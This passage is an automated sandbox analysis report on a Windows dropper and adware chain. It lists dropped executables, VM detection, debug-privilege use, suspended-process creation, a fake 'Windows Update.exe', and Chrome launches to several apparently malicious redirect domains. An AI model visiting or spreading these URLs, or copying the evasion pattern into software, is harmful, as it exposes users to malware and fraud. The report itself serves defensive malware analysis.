Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Thread delayed: delay time: 922337203685477
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\postproc-52.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nkn4qhlm.csu\autosubplayer.exe
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-IGHFO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\swresample-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1ffxnzir.1cn\random.exe
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-QLPAO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\AForge.Video.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-T1381.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-9KFTG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\avfilter-2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M2F05.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-2J58U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-685QJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-CUGLT.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\avdevice-53.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-O4BO6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M2F05.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-3FQP6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-PVRDV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-L76RD.tmp
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: chrome.exe, 00000018.00000003.376044571.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395688016.0000018BEE6D9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404837215.0000018BEE6EA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396302527.0000018BEE6EA000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: chrome.exe, 00000019.00000002.413066144.0000020F7E59B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: 7((_8888YTR(.exe, 00000003.00000002.323240096.0000000000C3A000.00000004.00000020.sdmp, ZHunuhebaqu.exe, 00000014.00000002.364182317.0000000000A26000.00000004.00000020.sdmp, chrome.exe, 00000019.00000002.413066144.0000020F7E59B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409B78
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00452AD4 FindFirstFileA,GetLastError, 1_2_00452AD4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0046417C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_004645F8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose, 1_2_00462BF0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 1_2_00498FDC
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00475798 FindFirstFileA,FindNextFileA,FindClose, 1_2_00475798

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00450334
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Process created: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe "C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe"
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Process created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe "C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Process created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe "C:\Program Files (x86)\windows multimedia platform\Windows Update.exe"
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Process created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe "C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe"
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00478DC4 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 1_2_00478DC4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 1_2_0042E0AC
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0042EE28 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA, 1_2_0042EE28

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: GetLocaleInfoA, 0_2_0040520C
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: GetLocaleInfoA, 0_2_00405258
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: GetLocaleInfoA, 1_2_00408578
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: GetLocaleInfoA, 1_2_004085C4
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
